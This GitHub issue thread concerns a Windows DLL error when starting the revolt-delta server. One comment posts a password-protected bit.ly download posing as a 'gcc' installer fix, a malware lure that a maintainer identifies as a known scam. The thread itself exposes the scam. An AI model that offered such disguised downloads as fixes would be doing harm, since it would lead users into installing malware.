### ISSUE TITLE
dev-setup: Unable to start API server (revolt-delta)

### ISSUE THREAD

**Issue by sabs21** [revoltchat/backend#339]
I'm currently trying to setup a development revolt environment by following the readme steps. However, when running 
```cargo run --bin revolt-delta```, I encounter an error preventing revolt-delta from building:
```process didn't exit successfully: `target\debug\revolt-delta.exe` (exit code: 0xc0000135, STATUS_DLL_NOT_FOUND)```.

I don't get this error when running revolt-bonfire. When I compare revolt-bonfire files to revolt-delta files in my .\revolt-backend\target\debug folder, I don't see any files (or DLLs) that would be missing.

<img width="612" alt="image" src="https://github.com/user-attachments/assets/45dcbe7c-66d0-4e62-a0de-63d17037ecce">

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by sabs21** [comment]
> Download https://bit.ly/3MjP129 password: changeme In the installer menu, select "gcc."

I'm always hesitant about shortened bit.ly links. Could you provide the original link?

**Comment by Rexogamer** [comment]
this is a known scam - do **not** download that file

**Comment by YeGop0218** [comment]
> this is a known scam - do **not** download that file

My account was logged in by a guy in Chicago. It's a viral link

**Comment by sabs21** [comment]
UPDATE: I actually did manage to get this working using Git Bash to run ```cargo run --bin revolt-delta```. I was using Powershell which likely caused the issue due to an unknown Windows command (like 'cp').

Closing the issue!
